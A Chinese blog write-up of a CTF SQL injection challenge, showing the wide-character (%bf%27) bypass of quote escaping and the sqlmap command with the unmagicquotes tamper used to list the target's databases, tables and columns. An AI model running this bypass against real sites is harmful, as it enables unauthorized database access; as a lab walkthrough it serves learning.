美文网首页
sql injection 3南邮 ctf

sql injection 3南邮 ctf

作者: 沙雕带你蒿羊毛 | 来源:发表于2017-11-04 11:11 被阅读0次

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

点进去就两句话,这么单调就先让我们看看html


好了。。。什么都没有

仔细一看,发现只有url里面可以注入了

随手一个 1'and'1'='1 上去


问题已经出来了哈,引号变成反斜杠了

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

其实从连接上也能看出来是 SQL-GBK了

sqlmap走一趟

这个时侯就要用另一个脚本了

脚本名:unmagicquotes.py

作用:宽字符绕过 GPC addslashes12345

Example:* Input: 1′ AND 1=1* Output: 1%bf%27 AND 1=1–%20

sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs

结果

available databases [2]:

[*] `sae-chinalover`

[*] information_schema


我们选择`sae-chinalover`

继续跑,相比于第一次,这次明显快很多

Database: sae-chinalover [5 tables]

+------+

| ctf |

| ctf2 |

| ctf3 |

| ctf4 |

| news |

+------+


很明显了,答案就在这几个里面

sqlmap跑

Database: sae-chinalover

Table: ctf2

[2 columns]

+---------+-------------+

| Column  | Type        |

+---------+-------------+

| content | non-numeric |

| id      | numeric    |

+---------+-------------+

别问我为什么跑ctf2,因为我已经跑完了。。

完了

服务器打不开了。。。。

不是封了我ip就是崩了


在注入题中,先手工一下,探探waf基本过滤规则,然后自行判断

相关文章

  • sql injection 3南邮 ctf

    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1 点进去就...

  • SQL注入1 南邮 ctf

    http://ctf.nuptsast.com/challenges# 这种题目一上来就给了你一个source很明...

  • 南邮ctf

    刚开始做ctf,水平有限多多谅解。 下面就开始分享我做出来的题目吧 1 签到题 a、点击题目给的题目地址,进入一个...

  • DVWA之SQL Injection(Blind)

    ————SQL Injection——(Blind)—— SQL Injection(Blind),即SQL盲注,...

  • 南邮 CTF记录

    前言: 记录一些题,继续学习。主要记录自己不懂得或忘记的,写的不好,还请谅解。如想查看完整的writeup,可参考...

  • 南邮ctf readasm

    题目如下图 主要是汇编的寄存器分不清各种的作用是什么。 不同位的寄存器名称:64位 -r 32位 -e 栈帧:C语...

  • 南邮wp(一)

    南邮wp 南邮ctf 1.Hello,RE! 用IDA打开,f5反编译,可见变量都是一些数字 选中数字,按R键,转...

  • sql注入

    sql injection sql injection 即 sql注入,指攻击者通过注入恶意的sql命令,破坏sq...

  • 南邮ctf部分 Writeup

    常见的术语: 肉鸡:被植入木马的电脑或者是服务器等联网设备。软件木马:远控软件的被控端(exe文件)脚本木马:脚本...

  • DVWA笔记之SQL injection

    SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQ...

网友评论

      本文标题:sql injection 3南邮 ctf

      本文链接:https://www.haomeiwen.com/subject/msntmxtx.html